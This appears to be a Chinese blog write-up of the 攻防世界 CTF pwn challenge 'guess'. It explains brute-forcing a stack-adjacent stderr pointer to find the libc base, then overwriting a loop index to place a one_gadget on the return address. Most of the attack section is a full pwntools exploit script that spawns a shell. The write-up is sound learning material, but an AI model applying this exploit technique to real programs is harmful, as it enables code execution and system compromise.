攻防世界 Pwn-guess

已于 2022-10-21 22:35:04 修改
阅读量689 收藏 1
点赞数 2
分类专栏: pwn成神之路 文章标签: 安全 网络
于 2022-10-21 22:34:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FUCKING12/article/details/127454455
版权

Pwn-guess

这题很有意思,我们来学习一下。
请添加图片描述
所有保护都开了
请添加图片描述
请添加图片描述

初一看程序,貌似没有漏洞,这题目出错了吧(doge)。
请添加图片描述
程序很奇怪,为什么要在这里面弄个stderr的指针,还没用,出于老油条的警觉,要仔细想想这里是否有兔子洞(doge),这里有个利用点,就是v4和v3只有0x10的距离,我们在比较的时候,就可以利用这个点,在v3输入0x10的垃圾数据后,后面就是stderr的地址,buf会和v4进行比较,那我们就可以一个字节一个字节的和stderr比较,如果对了,就执行后面的,没对,就重新输入,于是就可以爆破出stderr的地址。

for i in range(6):
    for j in range(1,256):
        p.sendafter('Account: ',b'a'*0x10+res+p8(j)+b'\x00')
        p.sendafter('Password: ',b'a'*0x10)
        if p.recv(2)=='We':
            res+=p8(j)
            p.sendline()
            # lg('res')
        sla('Choice: ',str(1))

爆破完地址后,就是怎么利用了。
请添加图片描述
注意这个函数的 i 是在栈上的,我们可以通过输入v1来控制i的值,来达到栈溢出的目的,
题目也出的很巧妙,在输入0x40个字节的垃圾数据后,就恰好覆盖的i的位置了,这时候改i为0x57,程序会去执行++i,判断i是否等于0x41,然后在v1[0x58]的地方输入,这里正好是ret所指向的数据,把这里修改成one_gadget就可以得到shell了。

from pwn import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
p = process('./guess')
#elf=ELF('./pwn')

#io = remote('59.110.24.117',33320)
libc = ELF('/home/pwn/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so')
rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def dbg():
    gdb.attach(p)
    pause()
res=''
sla('Choice: ',str(1))
# dbg()
for i in range(6):
    for j in range(1,256):
        p.sendafter('Account: ',b'a'*0x10+res+p8(j)+b'\x00')
        p.sendafter('Password: ',b'a'*0x10)
        if p.recv(2)=='We':
            res+=p8(j)
            p.sendline()
            # lg('res')
        sla('Choice: ',str(1))
stderr_addr=u64(res.ljust(8,b'\x00'))
lg('stderr_addr')
libc_addr=stderr_addr-libc.symbols['_IO_2_1_stderr_']
ogg=libc_addr+0x4f2a5 #0x10a2fc #0x4f302 

# p.sendlineafter('Account: ',b'\x00'*0x10)
# p.sendlineafter('Password: ',b'\x00'*0x10)
p.sendlineafter('Account: ',b'a'+b'\x00')
p.sendlineafter('Password: ',b'a')
payload=b'a'*0x40+p8(0x57)+p64(ogg)
sla('Welcome, Boss. Leave your valuable comments: ',payload)


# dbg()
irt()
thna0s
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3768
攻防世界-Pwn-new-easypwn
(wp)攻防世界PWN——guess_num
0pt1mus
04-02 1127
转载自个人博客0pt1mus 好久没有做PWN题了,今天开始做一下,把之前的东西捡起来,同时对之前有些知识点也有了新的认识,新的理解。 分析 首先将附件下载下来,同时通过nc连接一下,了解一下大致的流程。 可以看到,先让我们输入用户名,然后输入猜的的数字。 然后常规操作,通过file和checksec工具判断文件类型和开启了那些防护措施。 可以知道这是一个64位的linux程序,并且开启了部分...
PWN做题笔记4-guess_num(已修订)
qq_40923256的博客
04-19 393
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5057&page=1 如图,程序为64位ELF文件 安全机制全部开启,不太可能是注入地址 程序的功能为输入用户名,之后猜10个数,全部猜对可以获取flag main函数用户名存在注入点 查看栈结构可以发现用户名可以覆盖随机数种子 构造输入:b"A"*(0x20)+p32(0),随机数种子为0 以相同的...
pwn-GUESS
aitangdao4981的博客
09-03 190
参考了其他wp之后才慢慢做出来的 记录一下 首先checksec一下 有canary 放到IDA看下源码 运行流程大概是 有三个fork 即三次输入机会,于是无法爆破cannary 本题用的是SSP leak,当canary被覆盖是就会触发__stack_chk_fail函数,其中会打印字符串argv[0],覆盖它就能实现任意地址读 源码中有open("./flag...
[攻防世界]guess_num
逆向萌新的博客
06-01 674
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
pwn-200题目文件
02-16
pwn-200题目文件
[BUUTF]-PWN:wdb2018_guess解析(修改argv0)
最新发布
2301_79326813的博客
02-09 325
查看保护查看ida这道题并不复杂,只是要注意一点细节。
PWN 网鼎杯 GUESS
SsMing的博客
09-11 1679
拖了好久才看题,中间去参加比赛去了,休息够了开始学习啦! GUESS 在checksec查看后,发现开了canary 和 NX保护,所以可以用 stack smash 来做这个题 ida打开,查看一下源代码: 发现程序自己把读取flag到了栈中,所以思路就是: 1.通过覆盖argv[0]先泄露puts的地址 2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的...
[Pwn]攻防世界pwn题目wp--guess_num,hello_pwn
WitherC的练级之路
10-03 251
pwn 学习篇 0x1 攻防世界guess_num 下载题目所给附件,使用checksec 进行查看 发现是一个 64bit的文件,relro开启了部分保护以及开启了NX保护 常规丢进ida64进行反编译 左侧函数栏找到main函数 F5 发现函数体大致意思是通过rand()函数进行随机数的生成并对用户输入的数字进行十次比对,有一次不对即执行exit(1)终止此程序段,若10次都比对成功则可以得到返回的flag值。 由于随机数的产生不可控的,因此题目思路大概是通过在名字输入时的gets函数进行对seed的
攻防世界guess_num
Rt1Text的博客
03-27 504
题目 一点信息:猜数字 虚拟机里checksec
picoCTF pwn wp - Guessing Game 2
fa1c4的blog
06-25 386
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #define BUFSIZE 512 long get_random() { return rand; } int get_version() { return 2; } int do_stuff() { long ans .
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1282
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
pwn guess 中利用fork
weixin_44954083的博客
07-11 501
checksec 查看保护机制 guess 只有一个保护, 发现程序自己把读取flag到了栈中,所以思路就是: 1.通过覆盖argv[0]先泄露puts的地址 2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的地址(也就是栈的地址),为什么泄漏environ:https://www.jianshu.com/p/cc9d09a3f65f 有详细的解释 什么是environ? ...
[CTF题目总结-web篇]攻防世界-warmup
T2hunz1
01-10 7610
[CTF题目总结-web篇]攻防世界-warmup
攻防世界-guess_num-Writeup
SkYe's Blog
05-15 459
guess_num [collapse title=“展开查看详情” status=“false”] 考察点:利用栈溢出固定随机数 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int v4; // [rsp+4h] [rbp-3Ch] int i; // [rsp+8h] [rbp-38h] int v6; // [rsp+Ch] [rbp-34h] char v7; // [rsp+10h] [rbp-30h]
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值